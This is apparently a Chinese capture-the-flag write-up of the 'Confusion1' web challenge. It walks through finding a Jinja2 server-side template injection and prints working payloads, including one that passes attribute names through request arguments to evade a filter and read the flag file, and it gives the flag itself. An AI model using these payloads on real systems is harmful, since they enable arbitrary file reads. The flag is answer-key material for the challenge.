#|【攻防世界WEB】难度四星12分进阶题（Confusion1） web安全|php|安全|攻防世界WEB

三、Confusion1

文章图片

解题方法： 1、SSTI漏洞，构造payload

过程：

文章图片

大象and蛇（确实帅）
php+python想到了见过很多次的SSTI漏洞

文章图片

文章图片

先到处逛逛（这个里面都是一些信息）

文章图片

login和register都报错
（但是这里一定是很重要的地方）

文章图片

看robot.txt（没什么东西）

文章图片

考虑分析页面源码了
login.php中Ctrl+U查看页面源码
发现flag路径

文章图片

分析有没有SSTI漏洞
{{1+2}}
被运算了，得出结果3

文章图片

SSTI常用的注入
【#|【攻防世界WEB】难度四星12分进阶题（Confusion1）】__class__() 返回对象的类
__base__()/__mro__() 返回类所继承的基类
__subclasses__() 返回继承类的所有子类
pyaload：
{{"".__class__.__mro__[2].__subclasses__()[40]("/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt").read()}}
被过滤了

文章图片

构造payload
request 是 Flask 框架的一个全局对象 , 表示 " 当前请求的对象( flask.request ) "
request.args.key
args是参数，key可以是内置函数
——————
payload：
{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?&a=__class__&b=__mro__&c=__subclasses__&d=read

文章图片

cyberpeace{a92d9e29b89ab062c895ddc06f237cb6}

#|【攻防世界WEB】难度四星12分进阶题（Confusion1）

推荐阅读

Docker容器下快速搭建Hyperf框架在Windows系统的本地开发环境

u盘启动快捷键u盘启动快捷键

吃了止痛药能打新冠疫苗吗

FGO魔伊复刻流程攻略魔法少女纪行复刻活动流程推荐

随性写的

高三学生经商有前途吗？

让你的打印机重获新生益普生打印机废墨清零软件下载

3000元价位手机怎么选好 3000元价位手机怎么选

安乐什么意思安乐是什么意思

王者荣耀狂铁所有皮肤王者荣耀狂铁战令皮肤怎么样

代理服务器出了什么问题？代理服务器不能怎么回事

纵向沟通与横向沟通有何不同横向沟通与纵向沟通各有哪些优缺点

吃南瓜子能减肥吗

圆的面积和底面积一样吗? 圆的面积和底面积一样吗

手机cpu怎么设置最佳性能

宫腔镜|不知道宫腔镜有何优势？给你列出这3点，可别小瞧了

急脾气的妈妈怎么对待慢性子的孩子

粉扑拿回来要洗吗粉扑用完怎么放置

的哥马上要交班，却闯祸又丢工作

mysql查询前三名 mysql查询第三到第五